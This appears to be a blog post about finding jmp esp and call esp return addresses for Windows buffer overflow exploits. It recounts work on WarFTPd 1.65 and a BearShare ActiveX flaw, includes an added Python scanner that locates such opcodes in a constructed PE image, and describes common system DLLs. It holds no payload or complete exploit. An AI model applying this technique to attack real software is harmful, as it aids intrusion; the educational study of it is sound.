Win DLLs
Finding the right return was for me one of the most difficult aspects of getting my overflows to work on Win32. The examples in books like The Shellcoder's Handbook and The Art of Hacking were Linux based, and old for that matter. The examples didn't take into account safeguards imposed by the OS. When starting out it was vexing, to say the least.
My first successful Windows exploit was warftpd 1.65. It was straightforward, and after I fixed a minor typo in my code that was causing me to underrun the buffer and then overflow it later (so the exception was thrown somewhere in the middle of my shellcode), I got it! It was late at night and I think I woke up my wife when I yelled in excitement.
The return I used was a jmp esp that I found in kernel32.dll; I found the address using findjmp, which was written by Ryan Permeh of eEye. Findjmp finds useful jump points in a DLL.
A week later my co-worker sent me some exploit code for an ActiveX overflow in BearShare. He was out doing a vulnerability assessment when the advisory came out. He noticed, though, that the offset and returns for XP SP2 and XP SP2 (VMware) were different, so he sent it out to me and asked if I could get a quick return and check the offset for him. It took me a few minutes (mainly because I did not have the binary for findjmp and had to find a Visual C++ 6 compiler). This time I returned using a call esp, again into kernel32.dll.
Both times I returned into kernel32.dll, and it made me start to wonder: what's the difference between all the DLLs, and is there any significant advantage to using one over another? After asking my co-worker, the answer I received was, in short, no; it just depends on whether you can find the instruction you need and successfully reach your shellcode. This still made me want to go out and discover more about which DLLs did what. So I set about to find out, but could not find a central description of the most popular ones. So here is a rundown:
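As an added illustration (not findjmp's own code, and not from the original post): a small Python scanner over a constructed PE32 image that does what findjmp does for the two opcodes mentioned above, walking the section table and converting each hit's position in the file into a virtual address, and shows why the same jmp esp lands at a different address in a different build of the same DLL. The image, its ImageBase and the code bytes are all constructed for the demo.

```python
import struct

# Opcode sequences a findjmp-style scan looks for (constructed demo, not findjmp itself).
PATTERNS = {b"\xff\xe4": "jmp esp", b"\xff\xd4": "call esp"}

def build_sample_image(image_base, code):
    """Assemble a tiny, constructed PE32 image (not a real DLL) with one executable .text section."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)   # i386, one section, DLL
    opt = bytearray(0xE0)
    opt[0:2] = struct.pack("<H", 0x10B)                 # PE32 magic
    opt[28:32] = struct.pack("<I", image_base)          # ImageBase: the load address the VA is relative to
    sec = b".text\x00\x00\x00" + struct.pack(
        "<IIIIIIHHI", len(code), 0x1000, len(code), 0x200, 0, 0, 0, 0, 0x60000020)
    hdr = dos + b"PE\x00\x00" + coff + bytes(opt) + sec
    return hdr + b"\x00" * (0x200 - len(hdr)) + code    # raw data for .text starts at 0x200

def find_return_addresses(image):
    """Map each opcode hit inside an executable section to its virtual address (ImageBase + RVA)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    nsect = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    image_base = struct.unpack_from("<I", image, e_lfanew + 24 + 28)[0]
    sect_off = e_lfanew + 24 + opt_size
    hits = {}
    for i in range(nsect):
        s = sect_off + 40 * i
        va, rawsize, rawptr = struct.unpack_from("<III", image, s + 12)
        flags = struct.unpack_from("<I", image, s + 36)[0]
        if not flags & 0x20000000:   # IMAGE_SCN_MEM_EXECUTE: a hit in a non-executable section is useless
            continue
        data = image[rawptr:rawptr + rawsize]
        for pat, mnemonic in PATTERNS.items():
            pos = data.find(pat)
            while pos != -1:
                hits[image_base + va + pos] = mnemonic   # section offset -> RVA -> VA
                pos = data.find(pat, pos + 1)
    return hits

def demo():
    # Two constructed "builds" of the same library: same opcode, different position, so the
    # virtual address differs, which is why a return that worked on one build fails on another.
    build_a = build_sample_image(0x10000000, b"\x90\x90\xff\xe4\xc3\xff\xd4")
    build_b = build_sample_image(0x10000000, b"\x90" * 8 + b"\xff\xe4")
    return find_return_addresses(build_a), find_return_addresses(build_b)
```

Calling demo() returns the hits for both builds; the jmp esp sits at 0x10001002 in the first and 0x10001008 in the second.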
These are the most popular DLLs people tend to return to; they are also the ones outlined in the MSF opcode DB. Per the MSF Wiki, "Buffer overflow exploits on Windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLLs." Here is what the DLLs do:
Ntdll.dll – ntdll has the description "NT Layer DLL" and contains NT kernel functions. It can be located in the %systemroot%\system32 or i386 directory.
Kernel32.dll – Handles memory management, input/output operations, and interrupts. Kernel32.dll is loaded into a protected memory space so other applications do not take that space over.
User32.dll – Handles Windows functions related to the user interface (window handling, basic UI, and so forth).
Gdi32.dll – Contains functions for the Windows GDI (Graphics Device Interface), which assists Windows in creating simple two-dimensional objects.
Ws2_32.dll – Contains the Windows Sockets API, used by most Internet and network applications to handle network connections.
Ws2help.dll – Contains helper functions used by the Windows Sockets API, which is used by Internet and network applications.
For more information on DLLs, see the Wikipedia article on DLLs.
